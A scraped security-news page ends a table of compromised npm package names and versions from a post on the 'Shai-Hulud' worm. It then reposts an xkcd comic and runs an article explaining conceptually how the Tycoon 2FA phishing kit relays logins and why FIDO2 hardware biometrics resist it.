<td>posthog-js</td> <td></td> </tr> <tr> <td>posthog-plugin-hello-world</td> <td></td> </tr> <tr> <td>posthog-react-native</td> <td></td> </tr> <tr> <td>posthog-react-native-session-replay</td> <td>1.1.2.2.2.2.2</td> </tr> <tr> <td>@postman/pm-bin-windows-x64</td> <td>1.24.3, 1.24.5</td> </tr> <tr> <td>@postman/postman-mcp-server</td> <td>2.4.12</td> </tr> <tr> <td>@postman/postman-collection-fork</td> <td>4.3.3, 4.3.5</td> </tr> <tr> <td>@postman/pm-bin-macos-arm64</td> <td>1.24.3, 1.24.5</td> </tr> <tr> <td>@postman/mcp-ui-client</td> <td>5.5.1, 5.5.3</td> </tr> <tr> <td>@postman/pm-bin-macos-x64</td> <td>1.24.3, 1.24.5</td> </tr> <tr> <td>@postman/final-node-keytar</td> <td>7.9.1, 7.9.2</td> </tr> <tr> <td>@postman/pretty-ms</td> <td>6.1.1, 6.1.2</td> </tr> <tr> <td>@postman/postman-mcp-cli</td> <td>1.0.3, 1.0.4</td> </tr> <tr> <td>@postman/secret-scanner-wasm</td> <td>2.1.2, 2.1.3</td> </tr> <tr> <td>@postman/wdio-junit-reporter</td> <td>0.0.4, 0.0.5, 0.0.6</td> </tr> <tr> <td>@postman/wdio-allure-reporter</td> <td>0.0.7, 0.0.8</td> </tr> <tr> <td>@postman/tunnel-agent</td> <td>0.6.5</td> </tr> <tr> <td>@postman/pm-bin-linux-x64</td> <td>1.24.3</td> </tr> <tr> <td>@postman/node-keytar</td> <td>7.9.4</td> </tr> <tr> <td>@postman/csv-parse</td> <td>4.0.3</td> </tr> <tr> <td>@postman/aether-icons</td> <td>2.23.2</td> </tr> <tr> <td>@asyncapi/generator-react-sdk</td> <td></td> </tr> <tr> <td>@asyncapi/html-template</td> <td></td> </tr> <tr> <td>@asyncapi/java-spring-template</td> <td></td> </tr> <tr> <td>@asyncapi/modelina</td> <td></td> </tr> <tr> <td>@asyncapi/nodejs-template</td> <td></td> </tr> <tr> <td>@asyncapi/nunjucks-filters</td> <td></td> </tr> <tr> <td>@asyncapi/python-paho-template</td> <td></td> </tr> <tr> <td>@asyncapi/studio</td> <td></td> </tr> <tr> <td>@asyncapi/diff</td> <td></td> </tr> <tr> <td>@asyncapi/avro-schema-parser</td> <td></td> </tr> <tr> <td>@asyncapi/bundler</td> <td></td> </tr> <tr> <td>@asyncapi/cli</td> <td></td> </tr> <tr> <td>@asyncapi/converter</td> <td></td> </tr> <tr> <td>@asyncapi/dotnet-rabbitmq-template</td> <td></td> </tr> <tr> <td>@asyncapi/edavisualiser</td> <td></td> </tr> <tr> <td>@asyncapi/generator</td> <td></td> </tr> <tr> <td>@asyncapi/generator-components</td> <td></td> </tr> <tr> <td>@asyncapi/generator-helpers</td> <td></td> </tr> <tr> <td>@asyncapi/go-watermill-template</td> <td></td> </tr> <tr> <td>@asyncapi/java-spring-cloud-stream-template</td> <td></td> </tr> <tr> <td>@asyncapi/java-template</td> <td></td> </tr> <tr> <td>@asyncapi/keeper</td> <td></td> </tr> <tr> <td>@asyncapi/markdown-template</td> <td></td> </tr> <tr> <td>@asyncapi/modelina-cli</td> <td></td> </tr> <tr> <td>@asyncapi/multi-parser</td> <td></td> </tr> <tr> <td>@asyncapi/nodejs-ws-template</td> <td></td> </tr> <tr> <td>@asyncapi/openapi-schema-parser</td> <td></td> </tr> <tr> <td>@asyncapi/optimizer</td> <td></td> </tr> <tr> <td>@asyncapi/parser</td> <td></td> </tr> <tr> <td>@asyncapi/php-template</td> <td></td> </tr> <tr> <td>@asyncapi/problem</td> <td></td> </tr> <tr> <td>@asyncapi/protobuf-schema-parser</td> <td></td> </tr> <tr> <td>@asyncapi/react-component</td> <td></td> </tr> <tr> <td>@asyncapi/server-api</td> <td></td> </tr> <tr> <td>@asyncapi/specs</td> <td></td> </tr> <tr> <td>@asyncapi/web-component</td> <td></td> </tr> <tr> <td>@trigo/atrix-postgres</td> <td>1.0.3</td> </tr> <tr> <td>command-irail</td> <td>0.5.4</td> </tr> <tr> <td>@trigo/fsm</td> <td>3.4.2</td> </tr> <tr> <td>@trigo/trigo-hapijs</td> <td>5.0.1</td> </tr> <tr> <td>trigo-react-app</td> <td>4.1.2</td> </tr> <tr> <td>react-element-prompt-inspector</td> <td>0.1.18</td> </tr> <tr> <td>bool-expressions</td> <td>0.1.2</td> </tr> <tr> <td>atrix-mongoose</td> <td>1.0.1</td> </tr> <tr> <td>orbit-boxicons</td> <td>2.1.3</td> </tr> <tr> <td>@trigo/atrix</td> <td>7.0.1</td> </tr> <tr> <td>redux-forge</td> <td>2.5.3</td> </tr> <tr> <td>atrix</td> <td>1.0.1</td> </tr> <tr> <td>@trigo/atrix-acl</td> <td>4.0.2</td> </tr> <tr> <td>crypto-addr-codec</td> <td></td> </tr> <tr> <td>@trigo/atrix-swagger</td> <td>3.0.1</td> </tr> <tr> <td>@trigo/atrix-soap</td> <td>1.0.2</td> </tr> <tr> <td>@trigo/keycloak-api</td> <td>1.3.1</td> </tr> <tr> <td>@trigo/atrix-elasticsearch</td> <td>2.0.1</td> </tr> <tr> <td>@trigo/hapi-auth-signedlink</td> <td>1.3.1</td> </tr> <tr> <td>@trigo/atrix-pubsub</td> <td>4.0.3</td> </tr> <tr> <td>@trigo/atrix-orientdb</td> <td>1.0.2</td> </tr> <tr> <td>@trigo/node-soap</td> <td>0.5.4</td> </tr> <tr> <td>eslint-config-trigo</td> <td>22.0.2</td> </tr> <tr> <td>@trigo/atrix-redis</td> <td>1.0.2</td> </tr> <tr> <td>@trigo/eslint-config-trigo</td> <td>3.3.1</td> </tr> <tr> <td>@trigo/jsdt</td> <td>0.2.1</td> </tr> <tr> <td>@trigo/pathfinder-ui-css</td> <td>0.1.1</td> </tr> <tr> <td>@trigo/bool-expressions</td> <td></td> </tr> <tr> <td>@trigo/atrix-mongoose</td> <td>1.0.1, 1.0.2</td> </tr> <tr> <td>typeorm-orbit</td> <td>0.2.27</td> </tr> <tr> <td>orbit-nebula-draw-tools</td> <td>1.0.10</td> </tr> <tr> <td>@orbitgtbelgium/orbit-components</td> <td>1.2.9</td> </tr> <tr> <td>@orbitgtbelgium/time-slider</td> <td>1.0.187</td> </tr> <tr> <td>@orbitgtbelgium/mapbox-gl-draw-cut-polygon-mode</td> <td>2.0.5</td> </tr> <tr> <td>@orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode</td> <td>1.1.1</td> </tr> <tr> <td>orbit-soap</td> <td>0.43.13</td> </tr> <tr> <td>orbit-nebula-editor</td> <td>1.0.2</td> </tr> <tr> <td>@mparpaillon/imagesloaded</td> <td></td> </tr> <tr> <td>@mparpaillon/connector-parse</td> <td></td> </tr> <tr> <td>@louisle2/cortex-js</td> <td>0.1.6</td> </tr> <tr> <td>react-component-taggers</td> <td>0.1.9</td> </tr> <tr> <td>token.js-fork</td> <td>0.7.32</td> </tr> <tr> <td>react-library-setup</td> <td>0.0.6</td> </tr> <tr> <td>exact-ticker</td> <td>0.3.5</td> </tr> <tr> <td>jan-browser</td> <td>0.13.1</td> </tr> <tr> <td>@louisle2/core</td> <td>1.0.1</td> </tr> <tr> <td>lite-serper-mcp-server</td> <td>0.2.2</td> </tr> <tr> <td>cpu-instructions</td> <td>0.0.14</td> </tr> <tr> <td>evm-checkcode-cli</td> <td>1.0.12, 1.0.13</td> </tr> <tr> <td>bytecode-checker-cli</td> <td>1.0.8, 1.0.9</td> </tr> <tr> <td>gate-evm-check-code2</td> <td>2.0.3, 2.0.4</td> </tr> <tr> <td>devstart-cli</td> <td>1.0.6</td> </tr> <tr> <td>package-tester</td> <td>1.0.1</td> </tr> <tr> <td>@trefox/sleekshop-js</td> <td>0.1.6</td> </tr> <tr> <td>@caretive/caret-cli</td> <td>0.0.2</td> </tr> <tr> <td>mcp-use</td> <td>1.4.2, 1.4.3</td> </tr> <tr> <td>@mcp-use/inspector</td> <td>0.6.2, 0.6.3</td> </tr> <tr> <td>create-mcp-use-app</td> <td>0.5.3, 0.5.4</td> </tr> <tr> <td>@mcp-use/cli</td> <td>2.2.6, 2.2.7</td> </tr> <tr> <td>@mcp-use/mcp-use</td> <td>1.0.1, 1.0.2</td> </tr> <tr> <td>skills-use</td> <td>0.1.1, 0.1.2</td> </tr> <tr> <td>zuper-cli</td> <td>1.0.1</td> </tr> <tr> <td>test-hardhat-app</td> <td>1.0.1, 1.0.2</td> </tr> <tr> <td>zuper-stream</td> <td>2.0.9</td> </tr> <tr> <td>redux-router-kit</td> <td>1.2.2, 1.2.3</td> </tr> <tr> <td>create-hardhat3-app</td> <td>1.1.1, 1.1.2</td> </tr> <tr> <td>test-foundry-app</td> <td>1.0.1, 1.0.2</td> </tr> <tr> <td>zuper-sdk</td> <td>1.0.57</td> </tr> <tr> <td>gate-evm-tools-test</td> <td>1.0.5, 1.0.6</td> </tr> <tr> <td>claude-token-updater</td> <td>1.0.2, 1.0.3</td> </tr> <tr> <td>@markvivanco/app-version-checker</td> <td></td> </tr> <tr> <td>@hapheus/n8n-nodes-pgp</td> <td>1.5.0, 1.5.1</td> </tr> <tr> <td>esbuild-plugin-httpfile</td> <td></td> </tr> <tr> <td>open2internet</td> <td></td> </tr> <tr> <td>vite-plugin-httpfile</td> <td></td> </tr> <tr> <td>webpack-loader-httpfile</td> <td></td> </tr> <tr> <td>bun-plugin-httpfile</td> <td></td> </tr> <tr> <td>poper-react-sdk</td> <td>0.1.2</td> </tr> <tr> <td>@actbase/react-native-devtools</td> <td></td> </tr> <tr> <td>discord-bot-server</td> <td></td> </tr> <tr> <td>n8n-nodes-tmdb</td> <td>0.5.0, 0.5.1</td> </tr> <tr> <td>avm-tool</td> <td>0.16.0-beta.1</td> </tr> <tr> <td>@accordproject/concerto-analysis</td> <td></td> </tr> <tr> <td>@accordproject/markdown-docx</td> <td></td> </tr> <tr> <td>@accordproject/markdown-it-cicero</td> <td></td> </tr> <tr> <td>@clausehq/flows-step-jsontoxml</td> <td></td> </tr> <tr> <td>@ifelsedeveloper/protocol-contracts-svm-idl</td> <td></td> </tr> <tr> <td>@osmanekrem/error-handler</td> <td></td> </tr> <tr> <td>@seung-ju/next</td> <td></td> </tr> <tr> <td>@seung-ju/openapi-generator</td> <td></td> </tr> <tr> <td>@seung-ju/react-hooks</td> <td></td> </tr> <tr> <td>@seung-ju/react-native-action-sheet</td> <td></td> </tr> <tr> <td>@thedelta/eslint-config</td> <td></td> </tr> <tr> <td>@tiaanduplessis/json</td> <td></td> </tr> <tr> <td>@tiaanduplessis/react-progressbar</td> <td></td> </tr> <tr> <td>@varsityvibe/api-client</td> <td></td> </tr> <tr> <td>@varsityvibe/validation-schemas</td> <td></td> </tr> <tr> <td>asyncapi-preview</td> <td></td> </tr> <tr> <td>capacitor-plugin-apptrackingios</td> <td>0.0.21</td> </tr> <tr> <td>capacitor-plugin-purchase</td> <td>0.1.1</td> </tr> <tr> <td>capacitor-plugin-scgssigninwithgoogle</td> <td>0.0.5</td> </tr> <tr> <td>capacitor-purchase-history</td> <td>0.0.10</td> </tr> <tr> <td>capacitor-voice-recorder-wav</td> <td>6.0.3</td> </tr> <tr> <td>expo-audio-session</td> <td>0.2.1</td> </tr> <tr> <td>react-native-worklet-functions</td> <td>3.3.3</td> </tr> <tr> <td>scgs-capacitor-subscribe</td> <td>1.0.11</td> </tr> <tr> <td>scgsffcreator</td> <td>1.0.5</td> </tr> <tr> <td>@actbase/node-server</td> <td>1.1.19</td> </tr> <tr> <td>@actbase/react-native-fast-image</td> <td>8.5.13</td> </tr> <tr> <td>@actbase/react-native-kakao-navi</td> <td>2.0.4</td> </tr> <tr> <td>@actbase/react-native-less-transformer</td> <td>1.0.6</td> </tr> <tr> <td>@actbase/react-native-simple-video</td> <td>1.0.13</td> </tr> <tr> <td>@actbase/react-native-tiktok</td> <td>1.1.3</td> </tr> <tr> <td>@aryanhussain/my-angular-lib</td> <td>0.0.23</td> </tr> <tr> <td>@kvytech/cli</td> <td>0.0.7</td> </tr> <tr> <td>@kvytech/components</td> <td>0.0.2</td> </tr> <tr> <td>@kvytech/habbit-e2e-test</td> <td>0.0.2</td> </tr> <tr> <td>@kvytech/medusa-plugin-announcement</td> <td>0.0.8</td> </tr> <tr> <td>@kvytech/medusa-plugin-management</td> <td>0.0.5</td> </tr> <tr> <td>@kvytech/medusa-plugin-newsletter</td> <td>0.0.5</td> </tr> <tr> <td>@kvytech/medusa-plugin-product-reviews</td> <td>0.0.9</td> </tr> <tr> <td>@kvytech/medusa-plugin-promotion</td> <td>0.0.2</td> </tr> <tr> <td>@kvytech/web</td> <td>0.0.2</td> </tr> <tr> <td>medusa-plugin-announcement</td> <td>0.0.3</td> </tr> <tr> <td>medusa-plugin-momo</td> <td>0.0.68</td> </tr> <tr> <td>medusa-plugin-product-reviews-kvy</td> <td>0.0.4</td> </tr> <tr> <td>medusa-plugin-zalopay</td> <td>0.0.40</td> </tr> <tr> <td>@clausehq/flows-step-sendgridemail</td> <td></td> </tr> <tr> <td>@fishingbooker/browser-sync-plugin</td> <td></td> </tr> <tr> <td>@fishingbooker/react-swiper</td> <td></td> </tr> <tr> <td>hopedraw</td> <td></td> </tr> <tr> <td>hope-mapboxdraw</td> <td></td> </tr> </tbody> </table> </figure><p data-beyondwords-marker="058563e5-2295-49bb-bbd4-5ecac5d86e1c"> </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/shai-hulud-the-second-coming/" data-a2a-title="Shai-Hulud: The Second Coming"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fshai-hulud-the-second-coming%2F&amp;linkname=Shai-Hulud%3A%20The%20Second%20Coming" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fshai-hulud-the-second-coming%2F&amp;linkname=Shai-Hulud%3A%20The%20Second%20Coming" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fshai-hulud-the-second-coming%2F&amp;linkname=Shai-Hulud%3A%20The%20Second%20Coming" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fshai-hulud-the-second-coming%2F&amp;linkname=Shai-Hulud%3A%20The%20Second%20Coming" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fshai-hulud-the-second-coming%2F&amp;linkname=Shai-Hulud%3A%20The%20Second%20Coming" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/shai-hulud-the-second-coming/">https://www.mend.io/blog/shai-hulud-the-second-coming/</a> </p>

<figure class=" sqs-block-image-figure intrinsic "> <p> <a class=" sqs-block-image-link " href="https://via%20the%20comic%20artistry%20and%20dry%20wit%20of%20randall%20munroe,%20creator%20of%20xkcd/"></a></p> <p> <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png" data-image-dimensions="293x338" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" src="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=1000w" width="293" height="338" sizes="auto, (max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/80e0b8d1-9216-46a6-9d72-a6c01f11e093/airspeed.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs"></p> <p> </p> </figure><p><a href="https://www.infosecurity.us/blog/2025/11/24/randall-munroes-xkcd-airspeed">Permalink</a></p><p> </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/randall-munroes-xkcd-airspeed/" data-a2a-title="Randall Munroe’s XKCD ‘’Airspeed”"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Frandall-munroes-xkcd-airspeed%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98%E2%80%99Airspeed%E2%80%9D" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Frandall-munroes-xkcd-airspeed%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98%E2%80%99Airspeed%E2%80%9D" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Frandall-munroes-xkcd-airspeed%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98%E2%80%99Airspeed%E2%80%9D" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Frandall-munroes-xkcd-airspeed%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98%E2%80%99Airspeed%E2%80%9D" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Frandall-munroes-xkcd-airspeed%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98%E2%80%99Airspeed%E2%80%9D" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.infosecurity.us/">Infosecurity.US</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Marc Handelman">Marc Handelman</a>. Read the original post at: <a href="https://xkcd.com/3161/">https://xkcd.com/3161/</a> </p>

<p>Tycoon 2FA proves that the old promises of “strong MFA” came with fine print all along: when an attacker sits invisibly in the middle, your codes, pushes, and one-time passwords become <em>their</em> codes, pushes, and one-time passwords too.</p><h3><strong>Tycoon 2FA: Industrial-Scale Phishing Comes of Age</strong></h3><p>Tycoon 2FA delivers a phishing-as-a-service kit that hands even modestly skilled attackers a turnkey adversary-in-the-middle platform. The system sits between the user and the real site via reverse proxy, relaying what the victim sees, and capturing everything the victim sends—passwords, 2FA codes, and crucially, the resulting session cookies.</p><p>Once Tycoon captures a live session, it simply rides that session token into the target account, neatly sidestepping the very MFA the victim just completed. Newer versions add obfuscation and evasion features to defeat security tooling, pushing this from “clever trick” to industrialized capability that criminals can rent and reuse at scale.</p><h3><strong>Your Legacy MFA Just Became Single-Factor</strong></h3><p>Most enterprises still lean on “legacy” MFA: SMS codes, TOTP apps, email links, and simple push approvals. All these share one fatal weakness that Tycoon exploits—they depend on user-shared secrets or one-time responses that attackers can relay in real time through an adversary-in-the-middle.</p><p>Attackers no longer need to break your crypto; they only need to trick your user into completing a familiar flow on an untrusted page. Modern phishing kits make the fake page look and behave exactly like your IdP, use plausible domains in the URL, and consume any code the user enters instantly through the attacker’s backend. In that world, “something you know” and “something you have that just shows you a code” become, at best, latency hurdles—not security barriers.</p><h3><strong>The Binary Choice: Harden the Broken or Build the Unbreakable</strong></h3><p>Enterprises now face a stark question: do they keep hardening old models that attackers can still proxy?</p><p>Or should they move to authentication that cannot be replayed?</p><p>The second path means tying access to:</p><ul><li>Cryptographic keys sealed in hardware that never leave the device</li><li>User verification signals (biometrics, PIN) that the device evaluates locally and never transmits upstream</li></ul><p>Modern FIDO2/WebAuthn flows deliver exactly this: challenge–response using device-resident private keys, with phishing resistance baked in because the authenticator binds responses to both the origin and the key. When you implement it correctly, even a flawless Tycoon-style proxy cannot impersonate the cryptographic identity it never controls.</p><h3><strong>Hardware Biometrics: The Human-Device Bond Attackers Cannot Fake</strong></h3><p>Hardware biometrics add the crucial layer: they bind the hardware key truly to the human. Instead of “whoever holds this token,” the model becomes “whoever holds this token <em>and</em> matches the biometric template that only this token can verify.”</p><p>Common biometric modalities in this context include:</p><ul><li><strong>Fingerprint</strong>: capacitive sensors on security keys, laptops, phones, or wearables, validated inside a secure element</li><li><strong>Face or iris</strong>: device cameras combined with secure enclave processing, particularly on phones and laptops</li><li><strong>Behavioral signals</strong>: currently more niche for high-assurance auth, but emerging as risk signals layered on top</li></ul><p>The key design principle: raw biometric data never leaves the hardware. Instead, the device uses a stored template to unlock a key or assert user presence locally, then signs a challenge from the relying party.</p><h3><strong>TPMs, Secure Elements, and the Sacred “Never in the Cloud” Rule</strong></h3><p>Strong biometric MFA depends not just on <em>what</em> you use, but on <em>where</em> it lives. Trusted Platform Modules (TPMs) and similar secure elements exist specifically to:</p><ul><li>Generate and store private keys in tamper-resistant hardware</li><li>Perform cryptographic operations internally so keys remain forever unexportable</li><li>Bind keys to specific platform states and origins</li></ul><p>For biometrics, this means templates and key material must live inside the TPM or secure element and never synchronize to a cloud service. Cloud-stored biometrics create a permanent, unrevocable liability: people cannot rotate their fingerprints or faces the way they rotate passwords. When compromise becomes inevitable, the architecture must ensure that what leaks consists of revocable public keys or session artifacts—not the raw factors that make a person who they are.</p><h3><strong>The Future Wraps Around Your Finger</strong></h3><p>Vendors now push hardware biometrics into more convenient, always-with-you form factors while preserving phishing-resistant design. Token’s biometric ring, for example, uses an onboard capacitive fingerprint sensor and an EAL5+ certified secure element to store FIDO2 credentials, turning a wearable into a phishing-resistant authenticator that never exposes private keys. The recently announced Token BioKey line extends this model into USB, Bluetooth, and NFC security keys with on-device fingerprint verification and hardware-protected FIDO credentials for enterprise deployments.</p><p>Similarly, new approaches from companies like Badge, Inc. focus on using biometrics as an input to cryptographic processes that can deterministically reconstruct private keys on demand without ever storing the biometric itself in a recoverable form. In these systems, the biometric never leaves the secure execution environment and never persists directly; what persists consists of either hardware-protected cryptographic material or transformed data that remains useless without the original biometric presented locally again. That architecture sharply limits the blast radius of any backend compromise, because the data an attacker steals cannot impersonate the user or regenerate keys.</p><h3><strong>Stop Betting on Attacker Restraint</strong></h3><p>Tycoon 2FA and its successors represent not edge cases but the logical end state of a world that still trusts user-readable codes and browser-visible flows as “strong” authentication. As long as enterprises rely on MFA factors that attackers can proxy, prompt, and replay, adversaries-in-the-middle will continue turning those very protections into attack surfaces.</p><p>Rebuilding authentication around hardware biometrics—keys and wearables with on-device biometric verification, backed by TPMs and secure elements, speaking FIDO2/WebAuthn—fundamentally changes the game. This approach replaces secrets that travel with proofs that never leave the device, and binds identity to cryptography that phishing kits cannot silently inhabit or relay.</p><p>Organizations that refuse to revisit their 2FA choices now effectively bet that attackers will stop innovating. Organizations that move to hardware-anchored biometrics bet, correctly, that the only safe factor remains one that users cannot hand over—even when perfectly phished.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/the-death-of-legacy-mfa-and-what-must-rise-in-its-place/" data-a2a-title="The Death of Legacy MFA and What Must Rise in Its Place"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-death-of-legacy-mfa-and-what-must-rise-in-its-place%2F&amp;linkname=The%20Death%20of%20Legacy%20MFA%20and%20What%20Must%20Rise%20in%20Its%20Place" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-death-of-legacy-mfa-and-what-must-rise-in-its-place%2F&amp;linkname=The%20Death%20of%20Legacy%20MFA%20and%20What%20Must%20Rise%20in%20Its%20Place" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-death-of-legacy-mfa-and-what-must-rise-in-its-place%2F&amp;linkname=The%20Death%20of%20Legacy%20MFA%20and%20What%20Must%20Rise%20in%20Its%20Place" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-death-of-legacy-mfa-and-what-must-rise-in-its-place%2F&amp;linkname=The%20Death%20of%20Legacy%20MFA%20and%20What%20Must%20Rise%20in%20Its%20Place" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fthe-death-of-legacy-mfa-and-what-must-rise-in-its-place%2F&amp;linkname=The%20Death%20of%20Legacy%20MFA%20and%20What%20Must%20Rise%20in%20Its%20Place" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>